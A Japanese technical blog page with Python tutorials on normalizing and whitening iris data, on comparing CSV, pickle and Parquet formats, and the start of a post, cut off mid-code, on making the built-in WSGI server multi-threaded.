CUBE SUGAR CONTAINER

技術系のこと書きます。

Python: 無名数化によるデータの前処理

データエンジニアリングの分野では、分類精度などを高めるためにデータの前処理が重要となってくる。 今回は、そんな前処理の中でも無名数化と呼ばれる手法について見ていく。

無名数化というのは、具体的にはデータに含まれる次元の単位をなくす処理のことを指している。 単位というのは、例えば長さなら cm 重さなら kg といったもの。 単位のついた数値のことを名数、単位のない数値のことを無名数と呼ぶ。 単位の情報がある状態から、ない状態に変換することから無名数化と呼ばれる。

無名数化のメリットは使う手法によって異なるものの、基本的には次元による数値の大小の影響がなくなるところ。 使うモデルによっては数値の大きさに影響を受けやすいものがある。 例えば最近傍法などはその代表で、数値の大きな次元に影響を受けやすい。

使った環境は次の通り。 扱うデータセットにはアイリス (あやめ) データセットを用いた。

$ sw_vers 
ProductName:    Mac OS X
ProductVersion: 10.12.6
BuildVersion:   16G29
$ python --version
Python 3.6.3

下準備として、今回のサンプルコードで使うライブラリをインストールしておこう。

$ pip install scikit-learn matplotlib scipy

標準化

まず最初に紹介するのは標準化と呼ばれる手法から。 この手法は統計の世界でもよく使われるものになっている。 一般正規分布を標準化することで標準正規分布が得られることが有名。

これは、具体的にはデータの各要素からデータの平均値を引いて標準偏差で割る手法をいう。 数式で表すと、次のようになる。 標準化した値のことを Z スコアと呼んだりすることもある。

 Z = \frac{X - \mu}{\sigma}

ここで  X はデータの集合、 \mu はその平均値、 \sigma は標準偏差を表している。  Z が標準化した後のデータ、Z スコアということ。

データを標準化して Z スコアにすると、その平均値は 0 で標準偏差は 1 になる。

実際にアイリスデータセットを使って標準化するとどうなるのか試してみよう。 次のサンプルコードではアイリスデータセットの花びらの長さと幅の二次元を取り出して標準化している。 そして変換前と変換後でどのように分布が変わるのかを図示している。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from sklearn import datasets
from matplotlib import pyplot as plt


def main():
    # アイリスデータセットをロードする
    iris = datasets.load_iris()
    # petal length (花びらの長さ), petal width (花びらの幅) だけ取り出す
    X = iris.data[:, 2:]

    # 標準化する (平均を引いて標準偏差で割る)
    Z = (X - X.mean(axis=0)) / X.std(axis=0)

    # 標準化した後の母数を表示する
    Z_mean = Z.mean(axis=0)
    print('標準化後の平均値: {mean}'.format(mean=Z_mean))
    Z_std = Z.std(axis=0)
    print('標準化後の標準偏差: {std}'.format(std=Z_std))

    plt.scatter(X[:, 0], X[:, 1], label='before')  # 標準化前
    plt.scatter(Z[:, 0], Z[:, 1], label='after')  # 標準化後

    plt.ylim((-2, 3))
    plt.xlim((-2, 8))
    plt.xlabel('petal length')
    plt.ylabel('petal width')
    plt.plot([0, 0], [-2, 3], 'k--')
    plt.plot([-2, 8], [0, 0], 'k--')
    plt.grid(True)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    main()

上記をファイルに保存して実行してみよう。 プログラムの中では標準化後の次元の平均値と標準偏差を出力している。

$ python standarding.py
標準化後の平均値: [ -1.48251781e-15  -1.62314606e-15]
標準化後の標準偏差: [ 1.  1.]

平均値はとても小さくなってほとんど 0 になっているし、標準偏差はちゃんと 1 になっている。

標準化前と標準化後の散布図は次の通り。 標準化後は分布の中心が原点になって、バラつきも小さくなっていることが分かる。

f:id:momijiame:20171010182132p:plain

無相関化

続いては無相関化を扱う。 無相関化とは、文字通りだけど次元間の相関をなくす処理のことをいう。

データに複数の次元があるとき、それぞれの次元の間に相関があるか否かはデータエンジニアリングにおいて重要なポイントとなる。 なぜなら、二つの次元に相関があるとき、それはほとんど同じものが二つあることを意味しているため。 ある次元 A と B の間に正の強い相関があるとすれば、次元 A の値が大きいときは次元 B の値を大きいことになる。 だとすれば、分類や回帰をするときには A か B どちらか一方の次元さえあれば事足りてしまうことを意味する。

取り扱う次元の数が増えることは、時間・空間計算量が指数的に増加することを意味している。 つまり、データセットの各次元にはなるべく相関が少ない方が好ましい。 とはいえ、元から相関のないデータばかりではないことから、無相関化という処理で相関を取り除くというわけだ。 無相関化すれば、各次元間の相関は 0 になる。

無相関化の具体的なやり方としては、分散共分散行列の固有値問題を解くのが最初の一歩となる。 分散共分散行列というのは対角成分が分散、それ以外が各次元間の共分散になった行列のこと。 ひとまず、その分散共分散行列の固有値問題を解いて得られる固有ベクトルが重要になる。 この固有ベクトルのことを回転行列と呼んで、この回転行列を使ってデータを線形変換する。 数式に表すと次の通り。

 y = S^{ \mathrm{ T } }x

上記において  S が分散共分散行列の固有値問題を解いて得られた回転行列とする。 線形変換するデータが  x で、した結果が  y となる。 理論的な部分を細かく説明しても分かりにくくなるので、とりあえずこれくらいに抑えておく。

実際にデータを無相関化するサンプルコードを次に示す。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import numpy as np
from sklearn import datasets
from matplotlib import pyplot as plt


def main():
    iris = datasets.load_iris()
    X = iris.data[:, 2:]

    # 分散共分散行列を計算する
    Sigma = np.cov(X, rowvar=0)

    # 固有値、固有ベクトル (回転行列) を得る
    _, S = np.linalg.eig(Sigma)

    # 回転行列を使ってデータを線形変換する
    y = np.dot(S.T, X.T).T

    # 無相関化後の分散共分散行列を計算する
    y_cov = np.cov(y, rowvar=0)
    print('無相関化後の分散共分散行列: {cov}'.format(cov=y_cov))

    plt.scatter(X[:, 0], X[:, 1], label='before')
    plt.scatter(y[:, 0], y[:, 1], label='after')

    plt.ylim((-2, 3))
    plt.xlim((-2, 8))
    plt.xlabel('petal length')
    plt.ylabel('petal width')
    plt.plot([0, 0], [-2, 3], 'k--')
    plt.plot([-2, 8], [0, 0], 'k--')
    plt.grid(True)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    main()

上記をファイルに保存して実行してみよう。 すると、無相関化した後の各次元の分散共分散行列が得られる。 確認すると、二つの次元の共分散はとても小さい値になっていることから相関が取り除かれたことが分かる。

$ python decorrelating.py 
無相関化後の分散共分散行列: [[  3.65937449e+00  -1.43062296e-16]
 [ -1.43062296e-16   3.62192472e-02]]

得られる散布図は次の通り。 分布が右上がりや右下がりだと相関があることを意味している。 元々の分布は右上がりなので正の相関があったことを読み取れる。 それに対し無相関化後の分布は横にまっすぐ分布していることから相関があることは読み取れない。

f:id:momijiame:20171010190049p:plain

無相関化と主成分分析

実は無相関化と主成分分析 (PCA) には深い関わりがある。 というより、やっていることはほとんど同じといっていい。 具体的には無相関化に中心化という処理を加えたものが主成分分析になる。 中心化というのは、標準化でやっていた「平均を引く」処理のこと。 これをするとデータの分布の中心が原点になるので、文字通り中心化となる。

次のサンプルコードは先ほどとほとんど変わらない。 変更点は、無相関化するデータをあらかじめ中心化しているのみ。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import numpy as np
from sklearn import datasets
from matplotlib import pyplot as plt


def main():
    iris = datasets.load_iris()
    X = iris.data[:, 2:]

    # データを中心化する (平均を引くことで平均を 0 にする)
    X_centerized = X - X.mean(axis=0)

    # 分散共分散行列を計算する
    Sigma = np.cov(X, rowvar=0)

    # 固有値、固有ベクトル (回転行列) を得る
    _, S = np.linalg.eig(Sigma)

    # 回転行列を使ってデータを線形変換する
    y = np.dot(S.T, X_centerized.T).T

    # 無相関化後の分散共分散行列を計算する
    y_cov = np.cov(y, rowvar=0)
    print('無相関化後の分散共分散行列: {cov}'.format(cov=y_cov))

    plt.scatter(X[:, 0], X[:, 1], label='before')
    plt.scatter(y[:, 0], y[:, 1], label='after')

    plt.ylim((-2, 3))
    plt.xlim((-4, 8))
    plt.xlabel('petal length')
    plt.ylabel('petal width')
    plt.plot([0, 0], [-2, 3], 'k--')
    plt.plot([-2, 8], [0, 0], 'k--')
    plt.grid(True)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    main()

ファイルに保存して実行してみよう。

$ python centerizing.py 
無相関化後の分散共分散行列: [[  3.65937449e+00  -1.28159973e-16]
 [ -1.28159973e-16   3.62192472e-02]]

すると、次のような散布図が得られる。 先ほどの無相関化した散布図を中心に移動させた感じ。

f:id:momijiame:20171010201507p:plain

上記の散布図の形をちょっと覚えておいてほしい。

続いて登場するサンプルコードは scikit-learn を使って同じデータを主成分分析している。 scikit-learn では sklearn.decomposition.PCA を使って主成分分析ができる。 以下では、主成分分析した結果から第一主成分と第二主成分を散布図にプロットしている。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import numpy as np
from sklearn import datasets
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt


def main():
    iris = datasets.load_iris()
    X = iris.data[:, 2:]

    # 主成分分析
    pca = PCA()
    pca.fit(X)
    y = pca.fit_transform(X)

    # 第一・第二主成分の分散共分散行列を計算する
    y_cov = np.cov(y, rowvar=0)
    print('無相関化後の分散共分散行列: {cov}'.format(cov=y_cov))

    plt.scatter(X[:, 0], X[:, 1], label='before')
    plt.scatter(y[:, 0], y[:, 1], label='after')

    plt.ylim((-2, 3))
    plt.xlim((-4, 8))
    plt.xlabel('petal length')
    plt.ylabel('petal width')
    plt.plot([0, 0], [-2, 3], 'k--')
    plt.plot([-2, 8], [0, 0], 'k--')
    plt.grid(True)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    main()

上記を保存して実行してみよう。

$ python pca.py 
無相関化後の分散共分散行列: [[  3.65937449e+00   1.26669741e-17]
 [  1.26669741e-17   3.62192472e-02]]

次のような散布図が得られるので、さきほどの散布図と比較してほしい。 全く同じものになっているはずだ。

f:id:momijiame:20171010201526p:plain

つまり、主成分分析というのは中心化したデータを無相関化することと同義ということになる。

白色化

続いては白色化という処理を紹介する。 これは、無相関化した結果を標準化したような考えに近い。 つまり、白色化するとデータは各次元間の相関がなくなった上に平均が 0 で標準偏差が 1 になる。

ただし、やり方は少し複雑になっている。 処理は途中まで主成分分析のそれに近い。 つまり、まずは中心化したデータの分散共分散行列について固有値問題を解いて回転ベクトル  S を手に入れる。 次に、回転ベクトルの逆行列と分散共分散行列と回転行列の内積を計算して、これを  \Lambda とおく。

 \Lambda = S^{-1} \Sigma S

続いて  \Lambda の逆行列の平方根と、回転行列と中心化したデータの内積を計算して  u とおく。

 u = \Lambda^{-\frac{1}{2}} S^{\mathrm{ T }} (x - \mu)

この  u が白色化したデータを表す。

まあ、上の式だけを眺めていてもなんのこっちゃという感じなのでサンプルコードを以下に示す。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import numpy as np
from sklearn import datasets
from matplotlib import pyplot as plt


def main():
    iris = datasets.load_iris()
    X = iris.data[:, 2:]

    # データを中心化する (平均を引くことで平均を 0 にする)
    X_centerized = X - X.mean(axis=0)

    # 分散共分散行列を計算する
    Sigma = np.cov(X, rowvar=0)

    # 固有値問題を解いて固有値と固有ベクトル (回転行列) を得る
    _, S = np.linalg.eig(Sigma)

    # 回転行列の逆行列
    S_inv = np.linalg.inv(S)

    # 対角行列
    Lambda = S_inv.dot(Sigma).dot(S)

    # 対角成分だけ残す
    Lambda = (Lambda * np.identity(2)).transpose()

    # 各対角要素の平方根をとった行列の逆行列
    Lambda_sqrt_inv = np.linalg.inv(np.sqrt(Lambda))

    # 白色化する
    u = X_centerized.dot(S).dot(Lambda_sqrt_inv.T)

    # 白色化後の分散共分散行列
    u_cov = np.cov(u, rowvar=0)
    print('白色化後の分散共分散行列: {cov}'.format(cov=u_cov))
    # 同、平均
    u_mu = u.mean(axis=0)
    print('白色化後の平均: {mu}'.format(mu=u_mu))
    # 同、標準偏差
    u_std = u.std(axis=0)
    print('白色化後の標準偏差: {std}'.format(std=u_std))

    plt.scatter(X[:, 0], X[:, 1], label='before')
    plt.scatter(u[:, 0], u[:, 1], label='after')

    plt.ylim((-3, 3))
    plt.xlim((-2, 8))
    plt.xlabel('petal length')
    plt.ylabel('petal width')
    plt.plot([0, 0], [-3, 3], 'k--')
    plt.plot([-2, 8], [0, 0], 'k--')
    plt.grid(True)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    main()

上記をファイルに保存して実行してみる。

$ python whitening.py 
白色化後の分散共分散行列: [[  1.00000000e+00  -3.81499455e-16]
 [ -3.81499455e-16   1.00000000e+00]]
白色化後の平均: [ -1.36631447e-15   2.68192875e-15]
白色化後の標準偏差: [ 0.99666109  0.99666109]

出力内容から白色化後のデータは相関がなくなって平均が 0 になり標準偏差が 1 になることがわかった。

また、同時に次のような散布図が得られる。

f:id:momijiame:20171010204135p:plain

どの点がどの点に対応するのかも、もはやよく分からないほどだけど、これで良いようだ。

まとめ

今回はデータの前処理として無名数化と呼ばれる手法をいくつか試してみた。 無名数化というのは、データに含まれる次元の単位をなくす処理のことだった。

まずはじめに、標準化と呼ばれるデータの平均を 0 にして標準偏差を 1 にする手法を紹介した。 その次の無相関化では、データの各次元間の共分散 (相関) を 0 にできた。 そして、最後に紹介した白色化では共分散 (相関) を 0 にした上で平均を 0 標準偏差を 1 にできた。

参考文献

はじめてのパターン認識

はじめてのパターン認識

Python: Apache Parquet フォーマットを扱ってみる

今回は、最近知った Apache Parquet フォーマットというものを Python で扱ってみる。 これは、データエンジニアリングなどの領域でデータを永続化するのに使うフォーマットになっている。 具体的には、データセットの配布や異なるコンポーネント間でのデータ交換がユースケースとして考えられる。

これまで、同様のユースケースには CSV や Python の Pickle フォーマットが用いられていた。 ただ、CSV は行志向のフォーマットなので不要なカラムであっても必ず読まなければいけないという問題点がある。 また Pickle の場合は、それに加えて扱えるのが Python のコンポーネントに限られてしまう。

そこで登場するのが今回紹介する Apache Parquet フォーマットということらしい。 Apache Parquet フォーマットは Apache Hadoop エコシステムの一貫として開発されている。 カラム志向のファイルフォーマットになっていて、取り扱う上での時間計算量・空間計算量を減らすための工夫がなされているみたい。

今回試した環境は次の通り。

$ sw_vers
ProductName:    Mac OS X
ProductVersion: 10.12.6
BuildVersion:   16G29
$ python --version
Python 3.6.3

下準備

Apache Parquet を使った永続化について説明をする前に、これまではどういった選択肢があったかについて見ていきたい。 内容としては pandas の DataFrame オブジェクトを色々なフォーマットで保存したり読み込んでみる。

そこで、まずは pandas をインストールしておこう。

$ pip install pandas

サンプルとなる DataFrame オブジェクトを用意する。

>>> import pandas as pd
>>> df = pd.DataFrame([('Alice', 15),
...                    ('Bob', 20),
...                    ('Carol', 25)],
...                    columns=['name', 'age'])
>>> df
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

CSV フォーマット

まず、最初の選択肢として考えられるのは CSV フォーマットを使ったもの。 これは、多くのデータセットの配布に用いられているものなので、ほとんどの人にとって馴染み深いものだと思う。

pandas では DataFrame オブジェクトに to_csv() メソッドがあるので、それを使って永続化する。 index オプションに False を指定しているのは pandas がつけたインデックスのカラムを出力させないため。

>>> df.to_csv('users.csv', index=False)

これだけでカンマで区切られたおなじみのファイルができあがる。

$ cat users.csv
name,age
Alice,15
Bob,20
Carol,25

CSV フォーマットのファイルから DataFrame オブジェクトを復元するには read_csv() 関数を使う。

>>> pd.read_csv('users.csv')
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

Pickle フォーマット

続いては Python のシリアライズ・デシリアライズ機構である pickle モジュールを用いたやり方。 Pickle については次のブログエントリに詳しく書いている。

blog.amedama.jp

pandas には DataFrame オブジェクトを Pickle フォーマットのファイルにシリアライズするためのメソッドとして to_pickle() がある。

>>> df.to_pickle('users.pickle')

上記のメソッドを使っても構わないし、もちろん自分で pickle モジュールを使ってシリアライズしても良い。

>>> import pickle
>>> with open('users.pickle', mode='wb') as f:
...     pickle.dump(df, f)
...

読み込むときは read_pickle() 関数が使える。

>>> pd.read_pickle('users.pickle')
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

もちろん、読み込みに関しても pickle モジュールを使って自分でデシリアライズしても構わない。

>>> with open('users.pickle', mode='rb') as f:
...     pickle.load(f)
...
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

ただ、実際のところは pandas の API を通して Pickle を扱うのがおすすめ。 なぜかというと、簡単にデータの圧縮ができるので。

例えば、次のように compression オプションにフォーマットを指定するだけで圧縮できる。

>>> df.to_pickle('users.pickle', compression='gzip')
>>> pd.read_pickle('users.pickle', compression='gzip')
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

Parquet フォーマット

さて、本題に入るまで長かったけど、ここからやっと Parquet フォーマットについて扱う。

pandas の DataFrame オブジェクトを Parquet フォーマットでやり取りするにはいくつかのライブラリがある。 例えば fastparquetpyarrow がある。 今回は、その両方を試してみることにした。

fastparquet

まずは fastparquet から。

何はともあれ fastparquet パッケージをインストールする。

$ pip install fastparquet
$ pip list --format=columns | grep fastparquet
fastparquet        0.1.3

pandas の DataFrame オブジェクトを fastparquet でシリアライズするときは write() 関数を使う。

>>> from fastparquet import write
>>> write('users.parquet', df)

デシリアライズには ParquetFile オブジェクトを作った上で to_pandas() メソッドで DataFrame オブジェクトに変換する。

>>> from fastparquet import ParquetFile
>>> pf = ParquetFile('users.parquet')
>>> pf.to_pandas()
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

ちなみにシリアライズするときに圧縮をかけることもできる。 例えば GZIP フォーマットで圧縮するときは次のようにする。

>>> write('users.parquet', df, compression='GZIP')
>>> pf = ParquetFile('users.parquet')
>>> pf.to_pandas()
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

pyarrow

続いては pyarrow を使ってみよう。 pyarrow は Apache Arrow プロジェクトの Python 実装という位置づけ。 Apache Arrow というのは、データエンジニアリングにおいてプログラミング言語などに依存しないメモリ上での共通のオブジェクト表現を実現するためのプロジェクト。 Apache Arrow のオブジェクトを永続化するために Apache Parquet フォーマットが使える。 pandas のオブジェクトを直接使うことはできないので、一旦 Apache Arrow のオブジェクトに変換することになる。

まずは pyarrow パッケージをインストールしておく。

$ pip install pyarrow
$ pip list --format=columns | grep pyarrow
pyarrow            0.7.1

まずは pandas の DataFrame オブジェクトを pyarrow で Parquet フォーマットにシリアライズする手順から。 前述した通り、これには一旦 pyarrow の Table オブジェクトに変換する必要がある。

>>> import pyarrow as pa
>>> table = pa.Table.from_pandas(df)

その上で parquet モジュールを使ってテーブルをファイルに書き出す。

>>> from pyarrow import parquet as pq
>>> pq.write_table(table, 'users.parquet')

デシリアライズするときも、まずはファイルの内容を Table オブジェクトとして読み込む。

>>> table = pq.read_table('users.parquet')

その上で Table オブジェクトを pandas の DataFrame オブジェクトに変換する。

>>> table.to_pandas()
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

Parquet ファイルを圧縮したいときは write_table() メソッドに compression オプションを指定する。 ファイルを read_table() 関数で読み込むときは、自動で圧縮状態を認識してくれるようなので指定はいらない。

>>> pq.write_table(table, 'users.parquet', compression='gzip')
>>> table = pq.read_table('users.parquet')
>>> table.to_pandas()
    name  age
0  Alice   15
1    Bob   20
2  Carol   25

各フォーマットでのファイルサイズの比較

一通りの使い方が紹介できたので、続いてはフォーマットごとのファイルサイズを比較してみる。

サンプルとして、アイリスデータセットをダウンロードしてくる。

$ wget https://raw.github.com/vincentarelbundock/Rdatasets/master/csv/datasets/iris.csv

見慣れたいつものあれ。

$ head iris.csv
"","Sepal.Length","Sepal.Width","Petal.Length","Petal.Width","Species"
"1",5.1,3.5,1.4,0.2,"setosa"
"2",4.9,3,1.4,0.2,"setosa"
"3",4.7,3.2,1.3,0.2,"setosa"
"4",4.6,3.1,1.5,0.2,"setosa"
"5",5,3.6,1.4,0.2,"setosa"
"6",5.4,3.9,1.7,0.4,"setosa"
"7",4.6,3.4,1.4,0.3,"setosa"
"8",5,3.4,1.5,0.2,"setosa"
"9",4.4,2.9,1.4,0.2,"setosa"

元のサイズは 8kB だった。

$ du -h iris.csv
8.0K   iris.csv

できれば、もうちょっと大きいものを例にした方が良いと思うんだけど、とりあえずということで。

配布するときは圧縮をかけることも考えられるので tar.gz にもしてみよう。

$ tar czf iris.tar.gz iris.csv
$ du -h iris.tar.gz
4.0K   iris.tar.gz

4kB ということで、だいたい半分になった。

これを、まずは pandas の DataFrame オブジェクトとして読み込んでおく。

>>> import pandas as pd
>>> df = pd.read_csv('iris.csv')

Pickle

まずは Pickle フォーマットで保存する。 種類としては無圧縮のものと GZIP 圧縮をかけたものの二つ用意する。

>>> df.to_pickle('iris.pickle')
>>> df.to_pickle('iris.gzip.pickle', compression='gzip')

サイズを確認すると無圧縮のものは元の CSV と変わらず 8kB で圧縮をかけたものは 4kB になった。

$ du -h iris.pickle
8.0K   iris.pickle
$ du -h iris.gzip.pickle
4.0K   iris.gzip.pickle

fastparquet

続いては fastparquet を使って Parquet フォーマットで保存する。 今回も無圧縮のものと GZIP で圧縮したものを用意する。

>>> from fastparquet import write
>>> write('iris.fp.parquet', df)
>>> write('iris.fp.gzip.parquet', df, compression='GZIP')

サイズを確認すると無圧縮のものについては 12kB となって、元の CSV よりもサイズが増えている。 GZIP で圧縮したものについては 4kB と、かろうじて Pickle 形式のサイズに並んだ。

$ du -h iris.fp.parquet
 12K    iris.fp.parquet
$ du -h iris.fp.gzip.parquet
4.0K   iris.fp.gzip.parquet

pyarrow

続いては pyarrow を使って Parquet フォーマットで保存する。

前述した通り pyarrow では Parquet で保存する前に、まずは一旦 Table オブジェクトにする。 これがファイルサイズにどう影響するのかは気になった。

>>> import pyarrow as pa
>>> table = pa.Table.from_pandas(df)

変換した Table オブジェクトを Parquet フォーマットで保存する。 これには pyarrow.parquet.write_table() 関数を使う。 この関数はデフォルトで snappy を使ってデータ圧縮をかけるので、もし圧縮しないなら明示的に 'none' を指定する。

>>> from pyarrow import parquet as pq
>>> pq.write_table(table, 'iris.pa.parquet', compression='none')
>>> pq.write_table(table, 'iris.pa.gzip.parquet', compression='gzip')

ファイルサイズを確認すると 8kB となっていて元の CSV ファイルと同じだった。 また GZIP フォーマットで圧縮をかけた場合にもサイズが減っていない点は不思議に感じた。

$ du -h iris.pa.parquet
8.0K   iris.pa.parquet
$ du -h iris.pa.gzip.parquet
8.0K   iris.pa.gzip.parquet

ファイルのハッシュは異なるので、少なくともバイナリの内容は変化しているはずなんだけど。

$ md5 iris.pa.parquet
MD5 (iris.pa.parquet) = a148d8a431ec8903df4db4b67c2901b9
$ md5 iris.pa.gzip.parquet
MD5 (iris.pa.gzip.parquet) = faa7b6d73915b43e3a479d8418eb8cd1

もしかすると Apache Arrow が扱うオブジェクトの時点で何らかの最適化が行われているのかもしれない。

ファイルサイズのまとめ

一通り見ていくと保存したときのファイルサイズに関しては、どれも大して差はないようだった。 Apache Parquet についても元の CSV と同じか、もう少し大きくなる程度みたいだ。

各フォーマットでの読み込み時間の比較

続いてはメモリ上のオブジェクトにロードするときにかかる時間を比べてみることにした。 これ自体は、ファイルサイズの違いとか扱うオブジェクトの違いとかにも影響を受ける。 なので、今回のケースではこんな感じでしたっていう参考程度かも。

まずは、特定の処理を 10000 回実行するときの時間を測るための関数 stopwatch() を次のように用意しておく。

>>> import time
>>> def stopwatch(f, n=10000):
...     t0 = time.time()
...     for _ in range(n):
...         f()
...     t1 = time.time()
...     return t1 - t0
...

CSV

まずは無圧縮の CSV を 10000 回読む時間を測ってみよう。

対象は pandas の read_csv() 関数になる。 先ほどの stopwatch() 関数で時間を測れるようにデータセット名を関数に部分適用したものを作る。

>>> import functools
>>> read_csv = functools.partial(pd.read_csv, 'iris.csv')

上記で作った read_csv() 関数を使って時間を測ってみよう。

>>> stopwatch(read_csv)
9.748593091964722

今回使った環境では 9.74 秒かかった。

Pickle

続いては Pickle フォーマットを試してみる。

さっきと同じようにパラメータを部分適用した関数を作る。 無圧縮のものと GZIP 圧縮をかけたもの両方で測る。

>>> import functools
>>> read_pickle = functools.partial(pd.read_pickle, 'iris.pickle')
>>> read_gzip_pickle = functools.partial(pd.read_pickle, 'iris.gzip.pickle', compression='gzip')

実行してみると無圧縮のものが 3.58 秒で GZIP 圧縮したものが 4.77 秒だった。 CSV を扱うときの半分くらいで読めたことになる。

>>> stopwatch(read_pickle)
3.5826637744903564
>>> stopwatch(read_gzip_pickle)
4.771883010864258

圧縮したものが少し遅いのは解凍するのに時間がかかったせいなのかな。 これくらいのサイズだとディスクから読み込む時間には大差がなかったということかも。 もっと大きなデータセットを扱う場合には、結果がまた違ってくると思う。

Parquet (fastparquet)

続いては fastparquet を使って保存した Parquet フォーマットを測ってみる。

>>> import functools
>>> from fastparquet import ParquetFile
>>> read_fp_parquet = lambda: ParquetFile('iris.fp.parquet').to_pandas()
>>> read_fp_gzip_parquet = lambda: ParquetFile('iris.fp.gzip.parquet').to_pandas()

時間を測ってみよう。

>>> stopwatch(read_fp_parquet)
40.765795946121216
>>> stopwatch(read_fp_gzip_parquet)
50.68596577644348

ちょっとこれは予想外だったんだけど無圧縮のもので 40 秒、圧縮をかけたものでは 50 秒もかかった。 どこにボトルネックがあるのかは分からないけど時間がかかりすぎている。

Parquet (pyarrow)

続いては pyarrow を使って保存した Parquet フォーマットを測ってみる。

>>> import functools
>>> from pyarrow import parquet as pq
>>> read_pa_parquet = lambda: functools.partial(pq.read_table, 'iris.pa.parquet')().to_pandas()
>>> read_pa_gzip_parquet = lambda: functools.partial(pq.read_table, 'iris.pa.gzip.parquet')().to_pandas()

時間を測ってみよう。

>>> stopwatch(read_pa_parquet)
10.029934883117676
>>> stopwatch(read_pa_gzip_parquet)
10.79091191291809

pyarrow に関しては圧縮をかけてもかけなくても 10 秒前後となった。 CSV を扱うときと似たような時間になっている。

せっかくのカラム志向フォーマットなので、特定のカラムだけを読むような場合についても試してみよう。 データセットの中から Sepal.Length だけを読み出してみる。

>>> read_pa_parquet_sl = lambda: functools.partial(pq.read_table, 'iris.pa.parquet', columns=['Sepal.Length'])().to_pandas()
>>> read_pa_gzip_parquet_sl = lambda: functools.partial(pq.read_table, 'iris.pa.gzip.parquet', columns=['Sepal.Length'])().to_pandas()

時間を測ってみよう。

>>> stopwatch(read_pa_parquet_sl)
4.239685297012329
>>> stopwatch(read_pa_gzip_parquet_sl)
4.328531980514526

読み込むカラムを絞ると 4.3 秒前後と明確に時間が短くなった。

読み込み時間のまとめ

今回扱った環境では Pickle フォーマットの読み込みが早かった。 CSV と Parquet (pyarrow) がそれに続く感じ。 Parquet (fastparquet) は何が原因かまでは分からないものの、ちょっと時間がかかりすぎている。

Parquet (pyarrow) については読み込むカラムを制限すると明確に時間が短くなるのが面白かった。 ここらへんは、さすがカラム志向フォーマットという感じだろう。 取り扱うカラムがデータセットの一部だけ、という場面でこの特性は有利に働くと思われる。

全体のまとめ

今回は Apache Parquet フォーマットの Python 実装を試して、その特性を調べてみた。 今のところ Python でしか扱わないのであれば Pickle フォーマットで十分かなあという気もする。 とはいえデータセットが大きくて取り扱うカラムが一部だけという場面では pyarrow も使えそうだった。

pyarrow に関しては Apache Arrow という観点からも今後は使いやすくなっていくかもしれない。 Apache Arrow ではオブジェクトのメモリ上での表現方法の共通化についても狙ってきている。 つまり、今回でいえば Table オブジェクトが異なる言語やソフトウェアでも同様に扱えるようになっていくはず。 今回はデータの互換性という観点では見てこなかったけど、そこについても将来性があるということだ。

Python: 組み込みのソケットサーバをマルチスレッド化する

今回は小ネタ。 Python の標準ライブラリには、いくつか組み込みで提供されるソケットサーバの実装がある。

例えば WSGI サーバのリファレンス実装とか。

21.4. wsgiref — WSGI ユーティリティとリファレンス実装 — Python 3.6.1 ドキュメント

HTTP サーバを動かすためのやつとか。

21.22. http.server — HTTP サーバ — Python 3.6.1 ドキュメント

ただ、上記には弱点があって、それはシングルスレッドの実装ということ。 そのため、デフォルトでは同時に複数のアクセスをさばくことができない。 これが要するにどういうことなのか、というのは次の記事なんかに書いた。

blog.amedama.jp

今回は、そのままだとシングルスレッドで動くソケットサーバをマルチスレッドにする方法について書く。

動作確認に使った環境は次の通り。 ただし、一応 Python 2.7 で動くことも確認はしている。

$ sw_vers
ProductName:    Mac OS X
ProductVersion: 10.12.6
BuildVersion:   16G29
$ python --version
Python 3.6.2

wsgiref.simple_server.WSGIServer

WSGIServer クラスは WSGI サーバのリファレンス実装で、簡単なテストなんかするのに便利。 ただ、実装がシングルスレッドなので、そのままでは同時に複数のアクセスをさばくことができない。 とはいえ、まずは本当に同時に複数のアクセスをさばけないのか確認してみよう。

確認には次のサンプルコードを用いる。 ここで登場する application() 関数が WSGI アプリケーションとなっている。 これは、一つのアクセスに対してレスポンスを返すのに 5 秒もかかるように意図的に作ってある。 それを wsgiref.simple_server.make_server() 関数で作成した WSGI サーバで動かすコードとなっている。 この関数はデフォルトで組み込みで用意されているシングルスレッド実装の WSGIServer クラスを使って起動する。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time

from wsgiref.simple_server import make_server


def application(_environ, start_response):
    """レスポンスを返すまでに大きくディレイが入る WSGI アプリケーション"""
    start_response('200 OK', [('Content-Type', 'text/plain')])

    # レスポンスが返るまで 5 秒かかる
    time.sleep(5)

    yield b'Hello, World!\n'


def main():
    # デフォルトではシングルスレッドの WSGIServer で立ち上がる
    server = make_server('localhost', 8000, application)
    server.serve_forever()


if __name__ == '__main__':
    main()

動作確認

シングルスレッド云々の前に、まずは上記がちゃんと動くか、というところから確認してみよう。 ファイルとして保存したら Python で実行する。

$ python wsgisinglethread.py

次に、別の端末から curl なんかを使ってアクセスすると、ちゃんと動くことが分かる。 もちろん、ディレイを入れた分だけレスポンスが返ってくるのにたっぷり時間がかかる。

$ curl http://localhost:8000
Hello, World!

実行時間を測る

ちゃんと動くことが分かったので、次は同時に複数のアクセスをさばけないことを確認してみよう。 今回は、時間を測るのにも Python を使うことにした。

Python の標準ライブラリにある HTTP クライアントは使うのがだるいので requests をインストールする。

$ pip install requests

次のようなベンチマーク用のファイルを用意する。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time
from concurrent.futures import ThreadPoolExecutor

import requests


def main():
    # HTTP リクエスト 2 件を並行実行するための準備をする
    executor = ThreadPoolExecutor(max_workers=2)
    parameters = ['http://localhost:8000' for _ in range(2)]

    # 並行実行に要した時間を測る
    t0 = time.time()
    list(executor.map(requests.get, parameters))
    t1 = time.time()

